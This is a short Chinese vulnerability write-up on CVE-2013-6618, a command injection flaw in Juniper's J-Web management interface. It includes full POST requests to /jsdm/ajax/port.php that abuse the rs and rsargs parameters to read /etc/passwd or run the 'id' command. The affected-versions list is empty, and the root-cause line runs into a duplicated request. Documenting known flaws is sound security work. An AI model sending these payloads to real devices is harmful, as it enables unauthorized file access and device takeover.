Juniper J-Web 远程命令执行漏洞 (CVE-2013-6618) 是一个严重的安全漏洞,影响 Juniper Junos 操作系统在多个版本中的 Web 管理界面 J-Web。该漏洞允许远程已认证用户通过构造特定请求,实现任意命令执行,进而访问敏感文件或控制设备。
漏洞影响范围:
应用层 → 系统层
需认证,但攻击者可在认证后获取完整系统控制权限。
攻击者通过向 jsdm/ajax/port.php 页面发送特制的 POST 请求,利用 rsargs 参数进行命令注入。由于该接口处理用户传入参数时缺乏有效校验,攻击者可执行任意函数,如读取系统文件、执行命令等。
请求示例:
POST /jsdm/ajax/port.php HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
rs=file_get_contents&rsargs[]=/etc/passwd
上述请求中,rs=file_get_contents 指定了 PHP 函数,rsargs[]=/etc/passwd 则传递了读取的目标路径。若成功执行,将直接返回目标系统的 /etc/passwd 文件内容。
根本原因:
rs 与 rsargs 参数未做有效限制;POST /jsdm/ajax/port.php HTTP/1.1
Host: 192.168.0.1
rs=file_get_contents&rsargs[]=/etc/passwd
效果: 攻击者成功读取系统用户信息文件 /etc/passwd。
例如:
rs=system&rsargs[]=id
效果: 若服务器允许该行为,则可直接执行 id 命令,返回执行结果。
受影响的 Junos 版本包括:
📝 作者:ahlien 📧 邮箱:mfs24@mails.tsinghua.edu.cn
🏫 单位:Tsinghua University
📅 最后更新时间:2025-07-30